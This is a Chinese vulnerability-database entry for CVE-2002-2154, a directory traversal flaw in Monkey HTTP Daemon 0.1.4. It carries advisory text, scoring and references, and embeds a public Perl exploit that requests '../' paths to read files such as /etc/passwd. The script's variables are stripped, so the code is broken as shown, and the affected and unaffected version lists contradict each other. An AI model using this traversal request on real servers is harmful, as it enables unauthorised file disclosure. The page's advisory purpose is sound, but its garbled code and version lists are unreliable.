CVE-2002-2154
CVSS5.0
发布时间 :2002-12-31 00:00:00
修订时间 :2012-10-24 00:00:00
NMCOES    

[原文]Directory traversal vulnerability in Monkey HTTP Daemon 0.1.4 allows remote attackers to read arbitrary files via .. (dot dot) sequences.


[CNNVD]Monkey HTTP Server文件泄漏漏洞(CNNVD-200212-142)

        Monkey HTTP Daemon 0.1.4版本存在目录遍历漏洞。远程攻击者借助 .. (点 点)序列读取任意文件。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-22 [对路径名的限制不恰当(路径遍历)]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2154
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2154
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-142
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5792
(PATCH)  BID  5792
http://www.iss.net/security_center/static/10188.php
(UNKNOWN)  XF  monkey-dotdot-directory-traversal(10188)
http://archives.neohapsis.com/archives/bugtraq/2002-09/0298.html
(UNKNOWN)  BUGTRAQ  20020925 IIL Advisory: Reverse traversal vulnerability in Monkey (0.1.4) HTTP server

- 漏洞信息

Monkey HTTP Server文件泄漏漏洞
中危 路径遍历
2002-12-31 00:00:00 2006-01-30 00:00:00
远程  
        Monkey HTTP Daemon 0.1.4版本存在目录遍历漏洞。远程攻击者借助 .. (点 点)序列读取任意文件。

- 公告与补丁

        The vendor addressed this vulnerability in December 2001.
        Monkey Monkey HTTP Daemon 0.1.4
        

- 漏洞信息 (21857)

Monkey HTTP Server 0.1.4 File Disclosure Vulnerability (EDBID:21857)
linux remote
2002-09-25 Verified
0 DownBload
N/A [点击下载]
source: http://www.securityfocus.com/bid/5792/info

Monkey HTTP server is prone to a directory-traversal bug that may allow attackers to access sensitive files.

By passing a malicious query to a vulnerable server, an attacker can potentially gain access to arbitrary webserver-readable files. This issue occurs because the application fails to sufficiently validate the user-supplied input. 

#!/usr/bin/perl
#
# (0 day;) Monkey-0.1.4 reverse traversal exploit
#
# Usage:
#    perl monkey.pl <hostname> <httpport> <file>
#
#    <hostname> - target host
#    <httpport> - port on which HTTP daemon is listening
#    <file>     - file which you wanna get
#
# Example:
#    perl monkey.pl www.ii-labs.org 80 /etc/passwd
#
#                             by DownBload <downbload@hotmail.com>
#                             Illegal Instruction Labs
#
use IO::Socket;

 sub sock () {
    = IO::Socket::INET->new (PeerAddr => ,
                                  PeerPort => ,
                                  Proto    => "tcp")
   || die "[ ERROR: Can't connect to !!! ]\n\n";
 }

 sub banner() {
  print "[--------------------------------------------------]\n";
  print "[       Monkey-0.1.4 reverse traversal exploit     ]\n";
  print "[        by DownBload <downbload\@hotmail.com>      ]\n";
  print "[             Illegal Instruction Labs             ]\n";
  print "[--------------------------------------------------]\n";
 }

 if (0ARGV != 2)
 {
  banner();
  print "[ Usage:                                           ]\n";
  print "[    perl monkey.pl <hostname> <httpport> <file>   ]\n";
  print "[--------------------------------------------------]\n";
  exit(0);
 }

  = [0];
  = [1];
  = [2];

 banner();
 print "[ Connecting to ... ]\n";
 sock();
 print "[ Sending probe... ]\n";
 print  "HEAD / HTTP/1.0\n\n";
 while ( = <>) {  =  . ; }
 if ( =~ /Monkey/) { print "[ Monkey HTTP server found,
continuing... ]\n"; }
 else { die "[ SORRY: That's not Monkey HTTP server :( ]\n\n"; }
 close ();

 print "[ Connecting to ... ]\n";
 sock();
 print "[ Sending GET request... ]\n";
 print  "GET //../../../../../../../../../ HTTP/1.0\n\n";
 print "[ Waiting for response... ]\n\n";
 while ( = <>) { print ; }
 close ();
		

- 漏洞信息

59318
Monkey HTTP Daemon (monkeyd) URI Traversal Arbitrary File Access
Remote / Network Access Input Manipulation
Loss of Confidentiality
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

2002-09-25 Unknow
2002-09-25 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Monkey HTTP Server File Disclosure Vulnerability
Input Validation Error 5792
Yes No
2002-09-25 12:00:00 2007-07-09 03:27:00
Discovery credited to DownBload of Illegal Instruction Labs.

- 受影响的程序版本

Monkey Monkey HTTP Daemon 0.1.4
Monkey Monkey HTTP Daemon 0.5
Monkey Monkey HTTP Daemon 0.4.2
Monkey Monkey HTTP Daemon 0.4.1
Monkey Monkey HTTP Daemon 0.4

- 不受影响的程序版本

Monkey Monkey HTTP Daemon 0.5
Monkey Monkey HTTP Daemon 0.4.2
Monkey Monkey HTTP Daemon 0.4.1
Monkey Monkey HTTP Daemon 0.4

- 漏洞讨论

Monkey HTTP server is prone to a directory-traversal bug that may allow attackers to access sensitive files.

By passing a malicious query to a vulnerable server, an attacker can potentially gain access to arbitrary webserver-readable files. This issue occurs because the application fails to sufficiently validate the user-supplied input.

- 漏洞利用

An exploit is available:

- 解决方案

The vendor addressed this vulnerability in December 2001.


Monkey Monkey HTTP Daemon 0.1.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站